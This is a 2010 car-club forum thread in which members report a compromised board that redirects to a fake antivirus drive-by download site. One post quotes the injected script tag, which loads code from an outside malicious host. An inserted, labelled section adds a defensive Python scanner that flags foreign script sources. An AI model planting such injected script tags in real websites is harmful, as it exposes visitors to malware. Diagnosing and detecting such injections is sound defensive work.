Board problem

Started by Typhoon90, October 03, 2010, 11:31:29 AM


Typhoon90

Last two days when I've opened random topics, I have been redirected to a site that is trying to look like a malware search. The giveaway is it is still open in Safari but designed to look like the Windows XP menu system. I don't know if the site is malicious or not, but it does ask to "search" for problems, but it initialises a download.
I couldn't find a link on the site to report it to the relevant people.

Regards, Andrew.

Sheldon McIntosh

#1
It is a malicious site, I would suggest closing it straightaway if it happens again.

It shouldn't happen again, the previous moderator of this forum spent two hours trying to fix it last night, even though he is on an overseas holiday.

I'll buy him a beer when he gets back to thank him for his efforts.

Darryl

Quote from: Sheldon McIntosh on October 03, 2010, 12:43:52 PM
It is a malicious site, I would suggest closing it straightaway if it happens again.

It shouldn't happen again, the previous moderator of this forum spent two hours trying to fix it last night, even though he is on an overseas holiday.

I'll buy him a beer when he gets back to thank him for his efforts.

Well - it hasn't worked. Or if it did the attacker managed to re-inject the script - or maybe, given my ISP likes to use a #$@#$@ "transparent" proxy it's actually the proxy coming back with something stale...

Anyway, for the admin (if there is one - sounds like a bad situation for the "ex" and a sorry state of affairs for the club - before I saw your post I was going to suggest that the webmaster link was sadly absent - but looks like the webmaster is absent too):

The "root" of the evil still seems to be a script link at the bottom of each page:

<script src="http://meqashopperonline.com/mm.php"></script>

which gets a script from/on a server in Russia... which then grabs stuff from another server with the actual evil content on it...

hth....
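
The check described in the post above, as an added example that is not part of the original thread: a Python scan of a rendered page that lists every script tag loaded from a host outside an allowlist, with its line number. The allowlist hosts and the sample page are constructed for illustration; run it over the forum's served pages or its footer template.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site is expected to load scripts from (assumed values).
ALLOWED_HOSTS = frozenset({"forum.example.org", "cdn.example.net"})

class ScriptSrcCollector(HTMLParser):
    """Collect (line, src) for every <script src=...> tag in a page."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # the parser lower-cases tag and attribute names
            src = (dict(attrs).get("src") or "").strip()
            if src:
                self.scripts.append((self.getpos()[0], src))

def find_foreign_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return [(line, src)] for scripts whose host is not in the allowlist."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for line, src in parser.scripts:
        host = urlparse(src).hostname  # None for relative (same-site) URLs
        if host is not None and host not in allowed_hosts:
            findings.append((line, src))
    return findings

# Constructed sample page: the last script tag stands in for an injected one.
SAMPLE_PAGE = """<html>
<head>
<script src="/Themes/default/scripts/script.js"></script>
<script src="http://forum.example.org/js/theme.js"></script>
</head>
<body>
<p>Board problem</p>
<script src="//cdn.example.net/widget.js"></script>
<SCRIPT SRC="http://injected.example/mm.php"></SCRIPT>
</body>
</html>"""

if __name__ == "__main__":
    for line, src in find_foreign_scripts(SAMPLE_PAGE):
        print(f"line {line}: unexpected script source {src}")
```

A hit near the closing body tag on every page points at a shared footer template or a database-stored footer setting as the place to clean, rather than individual posts.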

Sheldon McIntosh

Hmm, I haven't seen it for a couple of days.

Darryl

Quote from: Sheldon McIntosh on October 03, 2010, 04:15:07 PM
Hmm, I haven't seen it for a couple of days.

There is some sort of saved state - I've had to clear my browser history to see it again.

I can't 100% confirm (from here at least) that it's not a proxy cache that is giving me the badness... Although based on headers it doesn't look like cached/stale.

ALFA156DALE

This has happened to me a few times too, it just happened before when I logged on here and went to the home page of AROCA, I thought it just might have been my computer.
-------------------------------
Alfa 156 2.5ltr V6
-------------------------------
Land Rover TDI 300
-------------------------------
Holden Kingswood 202

philpot

 :o

Yep, still there...

There's a thread in the Victorian section re this problem....

Got on this time but last try 15 minutes ago antivirus software blocked site as unsafe due to 17 'Fake Antivirus Webpage Requests'

'Drive-by Downloads' is the term....

See 'Malware on the Forum' in Victorian Section for more info....

:o
1992 33 1.7 16v QV - white     1998 156 Twin Spark - white     1990 33 1.7 16v QV - silver     1985 33 1.5 QV - silver

Past:   '81 Alfasud ti      '76 Alfasud ti